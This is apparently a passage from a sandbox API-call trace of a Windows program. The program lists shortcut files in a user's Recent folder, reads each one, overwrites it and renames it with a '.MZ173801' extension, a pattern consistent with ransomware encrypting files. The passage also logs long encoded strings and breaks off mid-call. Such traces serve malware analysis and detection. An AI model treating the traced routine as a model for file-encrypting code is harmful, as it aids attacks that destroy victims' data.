0x3e5 [0110.353] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.353] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3e5, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3e5, lpOverlapped=0x0) returned 1 [0110.354] CloseHandle (hObject=0x3f4) returned 1 [0110.355] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ONXmEb1WE6Xl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\onxmeb1we6xl.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.356] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3e5, lpOverlapped=0x0) returned 1 [0110.357] CloseHandle (hObject=0x3f4) returned 1 [0110.358] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ONXmEb1WE6Xl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\onxmeb1we6xl.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ONXmEb1WE6Xl.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\onxmeb1we6xl.lnk.mz173801")) returned 1 [0110.359] GetCurrentThreadId () returned 0x1358 [0110.359] GetCurrentThreadId () returned 0x1358 [0110.359] GetCurrentThreadId () returned 0x1358 [0110.359] GetCurrentThreadId () returned 0x1358 [0110.359] GetCurrentThreadId () returned 0x1358 [0110.359] GetCurrentThreadId () returned 0x1358 [0110.359] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb1fd710, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb1fd710, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb1fd710, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="o_sfpnC-AoY-JO.lnk", cAlternateFileName="O_SFPN~1.LNK")) returned 1 [0110.359] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.359] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.359] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o_sfpnC-AoY-JO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o_sfpnc-aoy-jo.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb1fd710, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb1fd710, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb1fd710, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x29c)) returned 1 [0110.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.360] GetCurrentThreadId () returned 0x1358 [0110.360] GetCurrentThreadId () returned 0x1358 [0110.360] GetCurrentThreadId () returned 0x1358 [0110.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.361] GetCurrentThreadId () returned 0x1358 [0110.361] GetCurrentThreadId () returned 0x1358 [0110.361] GetCurrentThreadId () returned 0x1358 [0110.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o_sfpnC-AoY-JO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o_sfpnc-aoy-jo.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.361] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.362] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.362] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x29c [0110.362] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.362] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x29c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x29c, lpOverlapped=0x0) returned 1 [0110.363] CloseHandle (hObject=0x3f4) returned 1 [0110.363] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o_sfpnC-AoY-JO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o_sfpnc-aoy-jo.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.364] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x29c, lpOverlapped=0x0) returned 1 [0110.365] CloseHandle (hObject=0x3f4) returned 1 [0110.366] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o_sfpnC-AoY-JO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o_sfpnc-aoy-jo.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o_sfpnC-AoY-JO.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o_sfpnc-aoy-jo.lnk.mz173801")) returned 1 [0110.367] GetCurrentThreadId () returned 0x1358 [0110.367] GetCurrentThreadId () returned 0x1358 [0110.367] GetCurrentThreadId () returned 0x1358 [0110.367] GetCurrentThreadId () returned 0x1358 [0110.367] GetCurrentThreadId () returned 0x1358 [0110.367] GetCurrentThreadId () returned 0x1358 [0110.367] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fc64407, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9fc64407, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9fc64407, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="p6BEEl6x9.lnk", cAlternateFileName="P6BEEL~1.LNK")) returned 1 [0110.367] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.367] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.367] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p6BEEl6x9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\p6beel6x9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fc64407, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9fc64407, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9fc64407, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x464)) returned 1 [0110.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.368] GetCurrentThreadId () returned 0x1358 [0110.368] GetCurrentThreadId () returned 0x1358 [0110.368] GetCurrentThreadId () returned 0x1358 [0110.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, 